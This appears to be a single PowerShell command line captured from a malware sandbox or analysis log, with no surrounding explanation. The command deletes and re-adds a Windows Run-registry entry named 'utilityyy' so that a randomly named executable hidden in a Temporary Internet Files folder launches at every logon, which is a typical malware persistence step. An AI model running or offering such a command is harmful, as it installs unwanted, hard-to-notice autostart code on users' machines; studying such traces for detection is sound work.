powershell.exe "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'utilityyy';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'utilityyy' -Value '"C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\utilityyy\Wsfghjklkjhgfd.exe\utilityyy.exe"' -PropertyType 'String'
2508